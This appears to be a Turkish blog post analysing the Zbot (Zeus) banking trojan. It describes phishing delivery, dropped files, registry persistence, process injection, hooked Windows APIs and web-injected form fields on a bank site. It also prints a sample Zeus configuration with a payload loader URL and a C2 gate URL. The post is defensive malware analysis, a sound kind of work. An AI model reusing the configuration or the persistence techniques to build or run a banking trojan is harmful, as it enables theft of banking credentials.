Trojan Zbot

zbotBulaştığı sistemden bilgi çalma amacıyla tasarlanmıştır.Hedef bilgisayardaki online bankacılık bilgileri üzerine yoğunlaşmaktadır. Zeus ya da Wsnpoem olarak da bilinmektedir. Zbot bu familya üzerinde tespit edilen tüm zararlı yazılımların temel adıdır. Code injection metoduyla tarayıcı üzerinden kimlik ve FTP şifresi gibi bilgileri de ele geçirebilir. Sistem içerisindeki tüm processlere kodunu bulaştırır. En önemli özelliği kullanıcının normal bir şekilde açmış olduğu bankacılık sitesi içerisindeki forma çeşitli kutucuklar ekleyerek bilginin bu şekilde saldırgan tarafına ulaşmasını sağlar. Ziyaret edilen bankacılık sistemine etki etmemektedir. Sadece kullanıcı bilgisayarında bu şekilde bir ekran ortaya çıkarttığından bankanın almış olduğu güvenlik düzeyinin veya şifreleme metodunun pek de bir önemi kalmamaktadır.(sadece zbot için tabi)  Zararlı kodlar işlemi bu şekilde offline olarak gerçekleştirdikleri için şifreleri düz metin olarak almaktadırlar.

  • Adı : Zbot
  • Keşif tarihi : 09.10.2010 – çeşitli varyantları daha eski tarihlere dayanabilir
  • Diğer isimleri : Zeus, Wsnpoem, PWS-Zbot, Monstres, Banker.C, Buzus-CE, Sinoval-WUK, QAKBot
  • Tipi: Trojan
  • Seviye : Orta
  • Platform : W32, W64

Trojan-building araçları ile oluşturulmuş direkt olarak bankacılık bilgilerini ele geçirmeye yönelik tehlikeli bu zararlı yukarıda da belirtildiği üzere tarayıcılar aktivitesini üzerine yoğunlaştırmıştır. Black market piyasasında 700 $ gibi fiyatlara bulunabilen toolkit sayesinde saldırgan, hedefindeki sistemi çalıştırdığı son çalıştırılabilir dosya ile zararlının tüm fonksiyonlarını yüksek dereceli şekilde yönetmesini sağlar. Bu toolkit ile saldırgan Zbot zararlısını dilediği gibi özelleştirebilir. Bu şekilde saldırganın ileri derecede teknik bilgi öğrenmesine ihtiyaç yoktur. Örnek araç kiti (toolkit):

İlk etapta kullanıcı FDIC, Myspace, Facebook ya da Microsoft gibi görünen adresten spam özellikli bir e-posta alır. İçerisinde bulunan link sayesinde hedef bilgisayarına inen zararlı dosyalar ayarlandığı fonksiyonlarına göre işlemeye başlar. Örnek e-posta:

Kimlik bilgileri söylendiği gibi çeşitli metodlar ile ele geçirilmeye çalışılır. Zararlı dosyaların hedef sistem üzerinde aktif hale gelmesiyle, Internet Explorer gibi tarayıcılar üzerindeki, FTP, veya POP3 şifrelerini hedef alabilir. Ancak en etkili yol legal olarak hali hazırdaki online bankacılık sitelerinde bulunan formlar içerisine örneğin kredi kartı şifresini alabilecek kutucuk ya da kutucuklar eklemektir.

Ek olarak Zbot komuta kontrol merkezi sunucusu ile bağlantıya geçerek ek dosya veya fonksiyonların çalıştırılmasına olanak verir. Bu sayede saldırgan çeşitli komutlar ile yeni exe dosyaları gibi çalıştırılabilir dosyaların hedef üzerine etkili olmasını sağlar, bilgisayarı kapatıp açabilir, ya da sistem dosyalarını silerek işletim sisteminin yeni kurulum yapılmadan açılmasını engelleyebilir.

TEKNİK ÖZELLİKLER

Sisteme bulaşan zararlı dosya kullanıcı eğer Administrator ise %System% klasörüne infekte olur, eğer değilse kullanıcı klasörüne geçiş yapar. %UserProfile%\Application Data.

Genelde kullandığı exe dosya isimleri;

  • ntos.exe
  • oembios.exe
  • twext.exe
  • sdra64.exe
  • pdfupd.exe

Bulaştığı yerde (sistem ya da kullanıcı dosyaları demiştik ) lowsec adında bir klasör oluşturarak şu dosyalardan birini içerisine atar.

  • video.dll
  • sysproc32.sys
  • user.ds
  • ldx.exe

 

 

Bu andan itibaren Zbot toolkit ile nasıl özelleştirilmişse o şekilde hareket etmeye başlar. Örnek olarak:

Entry “DynamicConfig”
url_loader “http://[REMOVED].com/zeusbot/ZuesBotTrojan.exe”
url_server “http://[REMOVED].com/zeusbot/gate.php”
file_webinjects “webinjects.txt”
entry “AdvancedConfigs”
;
end
entry “WebFilters”
“!http://%5BREMOVED%5D.com”
“https:// [REMOVED].com/*”
“!http://%5BREMOVED%5D.ru/*”
end
entry “WebDataFilters”
; “!http://%5BREMOVED%5D.ru/*” “passw;login”
end
entry “WebFakes”
; “http://[REMOVED].com” “http://[REMOVED].com” “GP” “” “”
end
entry “TANGrabber”
“https://[REMOVED].com/*/jba/mp#/SubmitRecap.do” “S3C6R2” “SYNC_TOKEN=*” “*”
end
entry “DnsMap”
;127.0.0.1
end
end

Akabinde yine lowsec klasörü içerisine ikinci bir dosya drop edilir:

  • audio.dll
  • sysproc86.sys
  • local.ds

Yukarıdaki herhangi drop edilen dosya içerisinde düz metin olarak ele geçirilmiş şifre bilgileri bulunur. Herhangi bir şekilde alınan şifreler bu dosyalara kaydedilir ve saldırgana daha sonra gönderilir.

Windows kayıt defterine aşağıdaki iki şekilde girdi yapılır. ( Birincisi kullanıcı admin ise diğeri admin değil ise )

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\”Userinit” = “%System%\userinit.exe, %System%\sdra64.exe”
  • HKEY_CURRENT_USER\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\”userinit” = “%UserProfile%\Application Data\sdra64.exe”

Yine zbot’un akıllı bir zararlı yazılım olduğunu bulaştığı servis isimlerine göre anlıyoruz. Kullanıcı admin ise -> winlogon.exe / admin değil ise -> explorer.exe

Ayrıca bir çok zararlının çok sevdiği svchost.exe dosyasına kod injekte ederek daha sonra banka bilgilerini almak için yerleşir.

Saldırgan komuta kontrol merkezi üzerinden hedefteki bilgisayarı:

  • Yeniden başlatabilir, kapatabilir
  • Sistem dosyalarını silerek bilgisayarı kullanılmaz bir hale getirebilir
  • Belirli bir linke erişimi engelleyebilir
  • URL’si eşleşen bir internet sitesini kendisine ait sahte kod infekte ederek değiştirebilir
  • Dosya indirip çalıştırabilir
  • Yerel bir dosyayı çalıştırabilir
  • Yerel aramada zararlı dosyaları gizleyebilir
  • Dosya ya da klasör upload edebilir
  • Dijital sertifikaları alabilir
  • Zbota ait konfigrasyon dosyasını değiştirebilir
  • Zararlı yazılımın exe dosya ismini değiştirebilir
  • Flash cookieleri silip yükleyebilir
  • Internet explorer başlangıç sayfasını değiştirebilir

Saldırgan sadece bunları yapmakla kalmayıp hedef bilgisayarlar üzerinde bir istatistik yönetimi sağlayarak tüm bu bilgisayarları botnet ağına dahil etmektedir. Ayrıca saldırganın yönettiği zeus botneti üzerinden çeşitli raporlar alınmasına olanak vermektedir.

Zararlı zbot’un komuta kontrol merkezine ilk gönderdiği bilgiler:

 

  • zbota ait benzersiz kimlik numarası
  • botnet adı
  • bot versiyonu
  • işletim sistemi versiyonu
  • işletim sistemi dili
  • işletim sistemi yerel saati
  • botun güncelleme saati
  • son rapor zamanı
  • hedef bilgisayarın ülkesi
  • hedef bilgisayarın ip numarası
  • çalışan process isimleri

Zbot’un şifre çalma metodu

Hedefe bulaşır bulaşmaz Protected Storage (PStore) adı verilen ve şifrelerin tutulduğu bölümü kontrol eder, özellikle Internet Explorer’ın hafızasında tutulan şifreleri hedef alır. Ayrıca cookieleri silerek önceden otomatik olarak girilen bir siteye kullanıcının şifre girmesini zorlar bu sayede ziyaret edilen ve login olunan sitelerin şifreleri de ele geçirilmiş olur.

Daha etkili bir şifre çalma metodu ise ziyaret edilen web sitelerine yönelik ayar dosyasına yazılarak saldırgana gönderilmesidir. Saldırgan ayar dosyasını etkinleştirdiğinde, istediği bir URL’yi takibe alır. Bu siteyi ziyaret eden kullanıcı şifre ve kullanıcı adını girer, bu şekilde çeşitli dlller üzerine yazılan şifreler saldırgana gönderilir.
WININET.DLL

  • HttpSendRequestW
  • HttpSendRequestA
  • HttpSendRequestExW
  • HttpSendRequestExA
  • InternetReadFile
  • InternetReadFileExW
  • InternetReadFileExA
  • InternetQueryDataAvailable
  • InternetCloseHandle

WS2_32.DLL and WSOCK32.DLL

  • send
  • sendto
  • closesocket
  • WSASend
  • WSASendTo

USER32.DLL

  • GetMessageW
  • GetMessageA
  • PeekMessageW
  • PeekMessageA
  • GetClipboardData

Trojan.Zbot ayrıca yukarıda da söylendiği üzere Web sitelerine ek kutucuklar ekleyebilir. Kullanıcı normal şartlarda girdiği ve bankacılık işlemini yaptığı site üzerinde kullanıcı adı ve şifre istenirken browser kod enjeksiyonu ile hesabı boşaltmaya yönelik üçüncü ve dördüncü kutucuklar eklenmektedir. Burada bilinmesi gereken en önemli nokta bu kutucukların offline olarak çalıştığıdır. Akbank tarafına sonraki iki kutucuktaki bilgiler gitmemekte, kullanıcı normal bankacılık işlemine devam edebilmektedir.  Saldırgan ise tüm kutucuklara işlenen bilgileri ele geçirebilmektedir.

Örnek olarak aşağıdaki görseller incelenebilir.

Normal şekildeki Akbank sitesi:

akbank

Kod injekte edilen Akbank sitesi; görüldüğü gibi kart numarası ve şifresini talep etmektedir:

akbanksahte

Reklamlar

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Connecting to %s